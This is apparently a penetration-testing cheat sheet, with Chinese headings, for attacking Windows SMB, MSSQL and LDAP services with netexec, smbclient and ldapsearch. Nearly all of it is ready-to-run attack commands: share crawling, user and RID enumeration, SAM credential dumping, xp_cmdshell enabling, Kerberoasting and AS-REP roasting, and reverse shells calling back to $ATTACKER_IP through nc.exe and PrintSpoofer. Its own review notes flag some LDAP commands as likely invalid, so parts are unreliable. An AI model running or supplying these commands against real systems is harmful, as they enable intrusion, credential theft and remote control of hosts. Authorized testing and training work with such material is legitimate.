SMB 枚举与利用清单
🔍 SMB 枚举与连接
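# --- SMB enumeration ---------------------------------------------------------
# Expects IP (and later USER/PASSWORD) to be set in the calling shell.
# Use the //host form: an unquoted `\\<IP>` collapses to `\<IP>` and bash then
# treats `<IP>` as a redirection from a file named "IP", not as a host.
smbclient -N -U "" -L "//$IP"
smbclient -N -U "test" -L "//$IP"
smbclient -N -U "Guest" -L "//$IP"
# Null-session share crawl; DOWNLOAD_FLAG=True makes spider_plus save the
# readable files locally (can be large — check disk/ROE first).
nxc smb "$IP" -u '' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
netexec smb "$IP" -u '' -p '' --shares
# Harvest first.last style names from the --users listing into users.txt
# (assumes the username is the 5th whitespace-separated field of nxc's line).
netexec smb "$IP" -u '' -p '' --users | grep -E "SMB\s+.*\s+[A-Za-z]+\.[A-Za-z]+" | awk '{print $5}' > users.txt
netexec smb "$IP" -u '' -p '' --rid-brute
# Authenticated exec check — example credentials only, substitute real ones.
nxc smb "$IP" -u 'Administrator' -p 'P@ssw0rd' -x whoami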
🔓 提权与命令执行
# --- Credential dumping -------------------------------------------------------
# Dump the local SAM (needs a local-administrator login on the target).
nxc smb $IP -u 'UserName' -p 'PASSWORDHERE' --sam
# Split a saved secretsdump-format dump (user:rid:LM:NT:::) into a username
# list and an NT-hash list (field 4) for cracking or pass-the-hash.
hash_line='^[^:]+:\d+:[a-f0-9]{32}:[a-f0-9]{32}'
grep -oP "$hash_line" secretsdump.txt | cut -d: -f1 > secretsdumpusernames.txt
grep -oP "$hash_line" secretsdump.txt | cut -d: -f4 > secretsdumphashes.txt
📂 文件传输
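# --- File transfer over SMB ---------------------------------------------------
# Snaffler release binary, pinned to 1.0.184. Nothing here verifies it —
# compare the hash against the release page before dropping it on a client host.
wget https://github.com/SnaffCon/Snaffler/releases/download/1.0.184/Snaffler.exe
# smbclient has no `-P <password>` option (`-P` is --machine-pass). Pass the
# password as user%password (or export PASSWD instead, to keep it out of `ps`).
smbclient "//$IP/share" -U "$USER%$PASSWORD" -c "put /path/to/local/file /remote/path/remote_file.txt"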
🚀 获取反向 Shell
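# --- Reverse shell via SMB ----------------------------------------------------
# Double quotes are required: '$USER' in single quotes sends the literal
# string $USER. The --put-file remote path is relative to the share nxc
# writes to (C$ unless --share is given), so stage into Windows\Temp, which
# exists on every host, and execute from the same location.
nxc smb "$IP" -u "$USER" -p "$PASSWORD" --put-file /path/to/nc.exe \\Windows\\Temp\\nc.exe
nxc smb "$IP" -u "$USER" -p "$PASSWORD" -x "C:\Windows\Temp\nc.exe $ATTACKER_IP 1234 -e cmd"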
MSSQL 枚举与利用清单
🔍 枚举与连接
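# --- MSSQL enumeration --------------------------------------------------------
# Windows auth is the default; add --local-auth for a SQL login. Pass the
# domain with -d rather than quoting 'DOMAIN\USER' — inside single quotes
# neither variable expands, and inside double quotes `\$` eats the backslash.
netexec mssql "$IP" -u '' -p ''
netexec mssql "$IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD"
nxc mssql "$IP" -u "$USER" -p "$PASSWORD" --rid-brute
netexec mssql "$IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -q "SELECT name FROM sys.databases"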
🔓 提权与命令执行
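# --- MSSQL privilege escalation / command execution ---------------------------
# Enabling xp_cmdshell needs sysadmin and is a logged configuration change.
netexec mssql "$IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --enable-xp-cmdshell
netexec mssql "$IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -x "whoami /all"
# mssql_priv: enumerate escalation paths first; ACTION=privesc presumably
# attempts the escalation itself — confirm with `nxc mssql -M mssql_priv --options`.
netexec mssql "$IP" -u "$USER" -p "$PASSWORD" -M mssql_priv
netexec mssql "$IP" -u "$USER" -p "$PASSWORD" -M mssql_priv -o ACTION=privesc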
📂 文件传输
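# --- File transfer over MSSQL -------------------------------------------------
# Remote path is a Windows path; `\\` collapses to `\` in an unquoted word.
nxc mssql "$IP" -u "$USER" -p "$PASSWORD" --put-file /tmp/local_file C:\\Windows\\Temp\\remote_file.txt
nxc mssql "$IP" -u "$USER" -p "$PASSWORD" --get-file C:\\Windows\\Temp\\remote_file.txt /tmp/local_file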
🚀 反向 Shell 获取
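# --- Reverse shell via MSSQL --------------------------------------------------
# --put-file takes LOCAL REMOTE; the original omitted the remote path, so
# stage nc.exe where the next line executes it from.
nxc mssql "$IP" -u "$USER" -p "$PASSWORD" --put-file nc.exe C:\\Windows\\Temp\\nc.exe
nxc mssql "$IP" -u "$USER" -p "$PASSWORD" -x "C:\Windows\Temp\nc.exe $ATTACKER_IP 1234 -e cmd"
# PrintSpoofer (SeImpersonatePrivilege -> SYSTEM). The outer command must be
# double-quoted so $ATTACKER_IP expands; escape the inner quotes.
nxc mssql "$IP" -u "$USER" -p "$PASSWORD" -x "C:\Windows\Temp\PrintSpoofer64.exe -c \"C:\Windows\Temp\nc.exe $ATTACKER_IP 1234 -e cmd\""
# Encoded one-liner (e.g. `powershell -enc <b64>`); replace the placeholder.
# -x needs a login able to use/enable xp_cmdshell — a null login usually cannot.
nxc mssql "$IP" -u '' -p '' -x '<PAYLOAD REVERSE SHELL BASE64 HERE>'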
LDAP 枚举与利用清单
🔍 枚举与连接
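# --- LDAP enumeration ---------------------------------------------------------
# Double quotes so the credential variables expand.
nxc ldap "$IP" -u "$USER" -p "$PASSWORD"
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" --users
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" --groups
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" --gpos
# Anonymous (-x) bind; replace the base DN with the target domain's.
ldapsearch -v -x -b "DC=example,DC=com" -H "ldap://$IP" "(objectclass=*)"
# LDIF attribute names are mixed case (sAMAccountName) — a case-sensitive
# grep for "samaccountname" matches nothing.
ldapsearch -v -x -b "DC=example,DC=com" -H "ldap://$IP" "(objectclass=*)" | grep -i samaccountname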
🔓 Kerberos 攻击与信息收集
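# --- Kerberos attacks ---------------------------------------------------------
# AS-REP roasting needs only usernames (no password; -u may be users.txt from
# the SMB section); Kerberoasting needs any valid domain login. Both write
# cracker-ready hashes to output.txt.
nxc ldap "$IP" -u "$USER" -p '' --asreproast output.txt
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" --kerberoasting output.txt
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" -M get-desc-users
# BloodHound collection. Giving -u/-p files makes nxc iterate the credential
# combinations (a spray, with lockout risk); prefer one known-good login.
nxc ldap "$IP" -u users.txt -p passwords.txt --bloodhound -c all --dns-server "$DNS_SERVER"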
📂 文件传输(LDAP 环境;nxc 的 ldap 协议本身似乎不提供文件传输,请先用 `nxc ldap --help` 确认,否则改用 smb)
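# --- "File transfer via LDAP" -------------------------------------------------
# NOTE(review): --put-file/--get-file are smb-protocol options in nxc (see the
# SMB section); the ldap protocol does not appear to expose them — confirm with
# `nxc ldap --help`, otherwise run these as `nxc smb`. Quotes fixed so the
# variables expand.
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" --put-file /tmp/local_file /remote/path/remote_file.txt
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" --get-file /remote/path/remote_file.txt /tmp/local_file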
🚀 获取反向 Shell(LDAP 环境;nxc 的 ldap 协议本身似乎不支持 -x 执行命令,请先确认,否则改用 smb)
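# --- "Reverse shell via LDAP" -------------------------------------------------
# NOTE(review): -x and --put-file are smb-protocol options in nxc; the ldap
# protocol does not appear to execute commands — confirm with `nxc ldap --help`
# and use `nxc smb` (SMB section) if not. Single quotes around '$USER' and
# around the PrintSpoofer command kept the variables literal; fixed below.
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" --put-file nc.exe /tmp/nc.exe
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" -x "C:\tmp\nc.exe $ATTACKER_IP 1234 -e cmd"
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" -x "C:\tmp\PrintSpoofer64.exe -c \"C:\tmp\nc.exe $ATTACKER_IP 1234 -e cmd\""
nxc ldap "$IP" -u "$USER" -p "$PASSWORD" -x '<PAYLOAD REVERSE SHELL BASE64 HERE>'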
🔧 其他 LDAP 利用方式
# --- Other anonymous LDAP pulls -----------------------------------------------
# Description attributes frequently carry notes or passwords left by admins.
ldapsearch -v -x -H "ldap://$IP" -b "DC=example,DC=com" "(objectclass=*)" | grep description
# Full anonymous dump against a lab domain (hutch.offsec); swap in the target base DN.
ldapsearch -v -x -H "ldap://$IP" -b "DC=hutch,DC=offsec" "(objectclass=*)"
🛠️ 渗透流程建议
✅ 前期准备
- 网络探测与端口扫描(Nmap, Masscan)
- 识别开放服务与版本
- 初步信息收集(Banner、SMB/LDAP 匿名访问等)
⚙️ 利用阶段
- 尝试已识别服务的漏洞利用
- 获取初始访问权限(低权限账号、RCE 等)
🔄 后渗透操作
- 横向移动、权限提升
- 凭证抓取、内网信息收集
- 敏感数据搜集与外泄(exfiltration)——仅在授权范围内进行
🧹 痕迹清除与文档记录(按交战规则执行清理,并记录所有操作)